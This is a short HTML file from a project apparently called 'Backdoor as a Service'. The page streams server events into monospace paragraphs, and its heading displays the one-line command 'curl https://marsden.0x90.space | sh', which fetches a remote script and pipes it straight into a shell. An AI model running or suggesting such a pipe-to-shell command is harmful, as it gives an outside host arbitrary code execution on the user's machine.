BaaS/src/index.html
2024-11-12 23:36:55 +01:00

22 lines
572 B
HTML

<!doctype html>
<html>
<head>
<title>Backdoor as a Service</title>
<script>
function init() {
const events = new EventSource("events");
events.onmessage = (event) => {
const p = document.createElement("p");
p.style["font-family"] = "monospace, monospace";
p.textContent = event.data;
document.body.appendChild(p);
}
}
</script>
</head>
<body onload="init();">
<h1>curl https://marsden.0x90.space | sh</h1>
<noscript>sry, requires javascript</noscript>
</body>
</html>